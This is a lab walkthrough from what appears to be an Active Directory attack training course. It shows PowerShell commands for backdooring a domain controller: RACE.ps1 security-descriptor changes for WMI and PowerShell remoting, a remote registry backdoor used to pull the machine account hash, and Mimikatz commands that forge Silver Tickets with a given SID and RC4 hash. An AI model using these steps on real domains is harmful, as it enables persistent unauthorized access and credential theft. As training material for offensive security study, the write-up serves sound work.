Obj 13 Security Descriptors

Task - Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access. Retrieve machine account hash from dcorp-dc with silver ticket.

Once we have administrative privileges on a machine, we can modify security descriptors of services to access the services without administrative privileges. Below command(to be run as Domain Administrator)modifies the host security descriptors for WMI on the DC to allow student access to WMI:

Start a new session, run invishell, and load race.ps1

. C:\AD\Tools\RACE.ps1

Set-RemoteWMI -SamAccountNamestudentx-ComputerName dcorp-dc.dollarcorp.moneycorp.local -namespace 'root\cimv2' -Verbosee

Now, we can execute WMI queries on the DC as studentx:

PS C:\AD\Tools> gwmi -class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Similar modification can be done to PowerShell remoting configuration. (In rare cases, you may get an I/O error while using the below command, please ignore it). Please note that this is unstable since spme patches in August 2020:

Enable PSSRemoting on the DC from the student vm

Set-RemotePSRemoting –SamAccountNamestudentx-ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose

We can now run commands using PowerShell remoting on the DC without DA privileges:

Invoke-Command -ScriptBlock{whoami} -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Retrieve machine account hash without DA

we first need to modify permissions on the DC to allow this. Start a new session as DA and load the race.ps1 script shown above.

Add RemoteBackDoor to DC

Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee studentx-Verbose

Now we can retrieve the machine hash to use later

. C:\AD\Tools\RACE.ps1
Get-RemoteMachineAccountHash -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose

We can use the machine account hash to create Silver Tickets. Create Silver Tickets for HOST and RPCSS using the machine account hash to execute WMI queries:

Create a Silver Ticket as HOST on the DC

Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511/target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:731a06658bc10b59d71f5176e93e5710/user:Administrator /ptt"'

Create a Silver Ticket as RPCSS on the DC

Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511/target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:731a06658bc10b59d71f5176e93e5710/user:Administrator /ptt"'

Check to make sure the tickets were made

klist

Now we can run WMI queries on the DC

PS C:\AD\Tools> gwmi -Class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local

PreviousObj 12 DCSync NextObj 14 Kerberoast Pass Crack

Last updated 3 years ago

hashtagStart a new session, run invishell, and load race.ps1

hashtagNow, we can execute WMI queries on the DC as studentx:

hashtagEnable PSSRemoting on the DC from the student vm

hashtagWe can now run commands using PowerShell remoting on the DC without DA privileges:

hashtagRetrieve machine account hash without DA

hashtagAdd RemoteBackDoor to DC

hashtagNow we can retrieve the machine hash to use later

hashtagCreate a Silver Ticket as HOST on the DC

hashtagCreate a Silver Ticket as RPCSS on the DC

hashtagCheck to make sure the tickets were made

hashtagNow we can run WMI queries on the DC

Start a new session, run invishell, and load race.ps1

Now, we can execute WMI queries on the DC as studentx:

Enable PSSRemoting on the DC from the student vm

We can now run commands using PowerShell remoting on the DC without DA privileges:

Retrieve machine account hash without DA

Add RemoteBackDoor to DC

Now we can retrieve the machine hash to use later

Create a Silver Ticket as HOST on the DC

Create a Silver Ticket as RPCSS on the DC

Check to make sure the tickets were made

Now we can run WMI queries on the DC